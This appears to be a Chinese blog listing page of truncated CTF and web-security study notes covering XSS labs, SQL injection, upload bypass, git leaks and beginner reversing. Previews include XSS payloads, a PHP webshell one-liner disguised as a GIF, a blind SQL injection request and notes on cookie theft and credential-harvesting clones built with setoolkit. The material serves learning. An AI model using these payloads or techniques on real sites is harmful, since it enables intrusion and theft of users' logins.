- 博客(35)
- 资源 (1)
- 收藏
- 关注
原创 Ubuntu换源(记录
备份源sudo cp /etc/apt/sources.list /etc/apt/sources.list.bak更新源sudo gedit /etc/apt/sources.list# 中科大镜像源deb https://mirrors.ustc.edu.cn/ubuntu/ bionic main restricted universe multiversedeb-src https://mirrors.ustc.edu.cn/ubuntu/ bionic main restricte
2021-08-10 11:51:35
764
原创 BMZctf WEB_ezeval WP
BMZctf WEB_ezeval WP先审计一下代码<?phphighlight_file(__FILE__);$cmd=$_POST['cmd'];$cmd=htmlspecialchars($cmd);$black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','assert'
2021-05-17 23:30:53
375
原创 xss challenge通关记录
xss challenge通关记录Stage #1Stage #2Stage #3Stage #4Stage #5Stage #6Stage #7Stage #8Stage #9Stage #10总结Stage #1//第一关没有任何过滤直接搞<script>alert(document.domain);</script>Stage #2//需要闭合"><script>alert(document.domain);</script>
2021-04-21 21:05:34
439
原创 利用xss窃取信息学习笔记
利用xss窃取信息学习笔记原理setoolkit工具克隆网站存储xss跳转克隆网站查看账号和密码原理克隆网站登陆页面,利用存储xss设置跳转代码,如果用户访问即跳转到克隆网站的登陆页面,用户输入登陆,账号和密码被存储。setoolkit工具克隆网站kali终端输入setoolkit接着输入y出现????接着依次选择1,2,3,2接着直接回车输入目标url即可然后访问那个url,转到dvwa的登陆界面存储xss跳转克隆网站将????payload存储到存储型xss中/
2021-04-16 14:43:24
300
原创 pikachu中sql注入(Sql Inject)系列(未完)
pikachu中Sql Inject系列学习目标:学习内容:前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结学习目标:初步认识并学习sql注入学习内容:借助pikachu练习sql注入前言提示:这里可以添加本文要记录的大概内容:例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。提示:以下是本篇文章正文内容,下面案例可供参考一、pandas是什么?示例:pandas 是基于NumPy 的一种工具,
2021-04-16 00:12:30
310
原创 XSS篡改网页链接学习记录
XSS篡改网页链接学习记录JS代码讲解XSS篡改链接篡改链接指向流量URL篡改链接指向恶意URLJS代码讲解window.onload 当窗口加载时,执行匿名函数。使用for循环遍历所有获得的链接a标签。<script>window.onload = function(){var link=document.getElementsByTagName("a"); //获取a标签,由于页面不一定只有一个a标签,link也可是个数组for(j=0;j<link.length;j
2021-04-15 21:14:09
986
1
原创 利用xss盗取cookie学习笔记
利用xss盗取cookiecookie介绍反射型xss盗取cookie利用cookie会话劫持劫持会话后的操作cookie介绍Cookie 是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。Cookie是由web服务器保存在用户浏览器(客户端)上的小文本文件,它可以包含有关用户的信息。目前有些Cookie是临时的,有些则是持续的。临时的Cookie只在浏览器上保存一段规定的时间,一旦超过规定的时间,该Cookie就会被系统清楚服务器可以利用Cookie包含信息的任意性来筛选并经常
2021-04-13 22:16:36
729
原创 XSS-labs学习笔记
XSS-labs学习笔记什么是xssXSS分类构造xss思路靶场练习Level1:Level2:Level3:Level4:Level5:Level6:Level7:Level8:Level9:Level10:Level11:Level12:Level13:Level14:Level15:Level16:Level17:Level18:什么是xssxss(Cross Site Script),跨站脚本攻击网页内嵌入HTML,CSS,JS代码此漏洞也是网站存在相当多的漏洞,仅次于SQL注入,攻击者可
2021-04-13 16:29:52
617
原创 xss.haozi.me通关记录
xss-haizi-me通关记录0x000x010x020x030x040x050x060x070x080x090x0A0x0B0x0C0x0D0x0E0x0F0x100x110x12传送门0x00server code:function render (input) { return '<div>' + input + '</div>'}input code:<script>alert(1)</script>html:<div
2021-04-13 15:56:39
1480
1
原创 代码审计练习题
代码审计练习题源码方法简单记录一下姿势源码<?php $var1 =$_GET['x']; $var2=$_GET['y'];if( (is_object($var1)&&is_object($var2)&&$var1 != $var2) && (md5($var1) === md5($var2)) && (sha1($var1) === sha1($var2)) ){ echo "you get it!";}el
2021-04-08 23:14:58
719
原创 php中is_numeric函数的绕过
php中is_numeric函数的绕过方法一方法二方法三$j = $_POST[j];is_numeric($j)?die("<br/>not is numeric <br/>fail 10"):NULL; //数组+16进制绕过 j[]=58B、j=1315%20、j=%001315if($j > 1314){echo "<br/>pass 10";}方法一利用数组+十六进制来进行绕过j[]=58B方法二j=1315%20j=13
2021-04-07 19:11:20
5765
原创 虎符ctf2021 签到记录
虎符ctf2021 签到记录你会日志分析吗web-签到签到题做个记录你会日志分析吗附件是sql查询记录 ????可以发现http返回长度有399和377两种而且377占比极少,那么377对应的记录就很可能与flag有关192.168.52.156 - - [11/Mar/2021:17:49:59 +0000] "GET /index.php?id=1'%20and%20if(ord(substr((select%20schema()),0,1))=48,sleep(2),1)--+ H
2021-04-05 18:26:29
642
3
原创 vnctf2021 web复现
vnctf2021 web复现Ez_game由于本人是个大菜鸡,比赛就签了个到,尝试来复现一下,对应题目在buu上[传送门]Ez_game解法一:在控制台中输入winTimer["endTime"]=99解法二:发现game.js中有这部分可疑字符串是sojson.v4加密,在线解密传送门可以在线解密也可以直接在控制台里边跑flagflag{this_game_is_funny!}想玩出来的话,我记得flag好像是在第10关,可以直接修改cookie进入第10关,我t
2021-04-04 21:43:36
455
2
原创 Linux 基础命令(未完结)
Linux 基础命令cat & tacmore & lessheadtailnlsortodawkcutgrepuniq简单记录一些做题常用的Linux命令cat & taccat (英文全拼:concatenate) 命令用于连接文件并打印到标准输出设备上。tac 从最后一行显示,作用类似cat。more & lessmore 命令类似于 cat , 不过会以一页一页的形式显示,更方便使用者逐页阅读,按空格(space)键 显示下一页,按b键往回显示,并且
2021-03-29 19:04:54
193
2
原创 从0开始学web(一) http篇
从0开始学web -- 基础 关于CRLF二级目录三级目录最近打算重新开始从头学web,简单记录一下关于CRLF二级目录三级目录
2021-03-27 14:15:04
200
原创 bugku web40
bugku web40 做题记录猜测git泄露解题猜测git泄露url:http://ip_address/.git发现确实存在git泄露解题在kali中递归下载 .git目录文件 ????得到一个文件夹wget -r http://ip_address/.git 在上一步得到的文件夹中执行命令????1、git reflog //查看执行的命令日志2、git reset 13ce8d0 //回退到该版本的版本库 多试几个commit id3、git sta
2021-03-09 09:34:17
1815
9
原创 [极客大挑战 2019]Upload
Buuctf [极客大挑战 2019]Upload题目信息考察点上传图片????抓包修改蚁剑链接题目信息考察点绕过后缀名检测:php,php3,php4,php5,phtml上传图片????因为<?被ban了所以采用如下方法GIF89a<script language="php"> eval($_POST["x"]);</script>将代码保存为gif文件抓包修改上传成功蚁剑链接在根目录找到flag或者直接在虚拟终端 c
2021-03-02 19:01:10
138
原创 攻防世界 web Training-WWW-Robots
攻防世界 web Training-WWW-Robots题目解题过程题目解题过程先baidu一下robots协议网站的根目录放一个robots.txt,会告诉搜索引擎这个网站里的那些文件可以访问,哪些不可以,所以我们先访问一下robots.txt可以看到他有一个不允许访问的文件f10g.php,但是robots.txt只是一个提示作用,并不一定代表这个php不能被访问,尝试访问一下fl0g.php...
2021-02-19 11:06:08
170
3
原创 攻防世界 re1
攻防世界 re1题目信息解题步骤GET FLAG题目信息解题步骤用ida打开,找到main函数F5转伪代码可以看到,输入v9之后,与v5比较,判断我们输入的flag是否正确。回头看这里双击(下图箭头处进入选中这两个字符串,按r转换倒着输入就可以了GET FLAGDUTCTF{We1c0met0DUTCTF}...
2021-01-29 15:22:55
380
原创 攻防世界 python-trade
攻防世界 python-trade题目信息解题步骤题目信息解题步骤发现题目附件可以打开尝试用vscod打开看源码。。发现不行查了一下 这是个pyc,得反编译(传送门)代码如下:#!/usr/bin/env python# visit http://tool.lu/pyc/ for more informationimport base64def encode(message): s = '' for i in message: x = ord(i)
2021-01-29 13:34:56
204
2
原创 攻防世界 逆向入门 Hello, CTF
攻防世界 逆向入门 Hello, CTF题目信息解题步骤题目信息解题步骤发现附件是可执行文件打开看看然后用ida打开附件,找到main函数,F5查看伪代码看这一块应该是将v10和v13比对那就找到v13在这里输入v13之后自动关闭了。。将v13用python转换即可s=bytes.fromhex("437261636b4d654a757374466f7246756e")print(s)就是这样了。。直接交就好了CrackMeJustForFun...
2021-01-24 22:53:11
171
原创 攻防世界 逆向入门 open-source
攻防世界 逆向入门 open-source题目信息解题步骤题目信息解题步骤题目附件是个源码打开它逐步分析if (first != 0xcafe) { printf("you are wrong, sorry.\n"); exit(2);}//不等于0xcafe就退出,那first=0xcafeif (second % 5 == 3 || second % 17 != 8) { printf("ha, you won't get it!\n"); exi
2021-01-24 22:52:08
211
原创 攻防世界 逆向入门 insanity
攻防世界 逆向入门 insanity题目信息解题步骤题目信息解题步骤用ida打开附件搜索文本 flag欸欸欸,好巧就这样了。。还真是一个简单的。。
2021-01-24 14:58:09
158
原创 攻防世界 逆向入门 game
bugku 游戏通关题目:游戏通关正经解题环节总结以下是本篇文章正文内容题目:游戏通关下载附件并打开题目意思是输入不同的数字(1-8)对应的会有图形变亮(由黑变白)所以只要输入数字使所有图型全部变白即可这里我是直接硬玩(输入五六次就出来了)爆出了flag(hahahahaha)flag is zsctf{T9is_tOpic_1s_v5ry_int7resting_b6t_others_are_n0t}呃 接下来是正经解题环节正经解题环节淦 我还不会!!!!总结提示:这里
2021-01-24 13:14:36
412
2
原创 宽字节注入学习笔记
宽字节注入学习笔记前言一、什么是宽字节注入?二、练习题目链接:前言这周学习sql注入,做笔记记录一下一、什么是宽字节注入?二、练习题目链接:http://chinalover.sinaapp.com/SQL-GBK/sqli-labs 第32关(没有搭建的话可以去buuctf找basic中的sqli-labs)[这个可以配合理解,自行操作效果极佳]随便输个id尝试用单引号闭合发现‘ ‘ ’(单引号)转变成了‘ \’ ’(反斜杠+单引号)那就结合今天所学知识进行操作
2021-01-13 17:55:24
239
原创 the cryptopals crypto challenges学习记录(一)
Python学习记录学习内容:这里可以添加要学的内容例如:1、 搭建 Java 开发环境2、 掌握 Java 基本语法3、 掌握条件语句4、 掌握循环语句学习产出:提示:这里统计学习计划的总量例如:1、 技术笔记 2 遍2、优快云 技术博客 3 篇3、 学习的 vlog 视频 1 个...
2021-01-10 15:24:58
1316
1
原创 bugku web 13 writeup
bugku web4题目信息解题思路FLAG题目信息解题思路先随便输一个貌似和web5比较像F12查看源代码其实先查看源代码最好关键代码如下:var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%.
2020-12-04 17:38:20
244
原创 bugku web5 writeup
bugku web5题目信息解题过程FLAG题目信息解题过程打开链接发现是一个框框随便输一个试试出现了 “在好好看看”选择去查看一下源代码发现一串东西([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(![]+[.
2020-12-04 17:25:15
192
原创 bugku web 头等舱 writeup
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档bugku 头等舱题目信息做法:FLAG题目信息做法:根据题目信息可以得知flag应该和“头”有关所以考虑用burp suite抓包ctrl+R 发送到Repeater这样就发现了flagFLAGflag:flag{Bugku_k8_23s_istra}...
2020-12-04 17:08:51
208
原创 bugku 你必须让他停下 writeup
bugku 你必须让他停下你必须让他停下手速流(233一般解法你必须让他停下打开之后是这样的界面发现网站在不断跳转 按下F12发现这个位置的内容一直在跳手速流(233接下来就是考验手速的时刻啦hahaha得到flag如图一般解法由于网站在不断地跳转所以考虑用bp抓包 下载地址最终得到flagflag{dummy_game_1s_s0_popular}web类第7篇就结束啦 想看其他的请前往目录哦...
2020-12-04 08:18:48
305
原创 bugku 域名解析 writeup
bugku web 域名解析前言域名解析前言web类是一题一篇的写的哦 前边的wp都在目录里(233提示:以下是本篇文章正文内容域名解析题目意思是把flag.bugku.com 解析到120.24.86.145windows下修改的文件为:c:\windows\system32\drivers\etc\hosts(如果出现没有权限的问题请参看这篇文章:Windows10没有修改hosts文件权限的解决方案(亲测有效))修改过程如上图这就OK了,访问flag.bugku.com,爆
2020-12-03 12:00:27
125
1
原创 bugku web3 writeup
bugku web3 web3web3按下F12查看源代码发现一串unicode可以自己写一个html web类第6题就到此结束啦
2020-12-03 11:53:20
193
原创 bugku WEB 矛盾 writeup
bugku WEB 矛盾矛盾矛盾函数is_numeric() 判断变量是否为数字如果var是数字和数字字符串返回TRUE否则返回FALSE即num既不能是数字字符,但是要等于1因此,构造payload num=1a(开头为1,字母随意) 提交上去得到flag...
2020-12-03 11:14:39
138
原创 bugku WEB 计算器
bugku WEB 计算器计算器计算器发现只能输入一位数字按下F12修改maxlength 为2发现可以输入两位了得到flagflag{CTF-bugku-0032}
2020-12-03 10:56:33
164
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人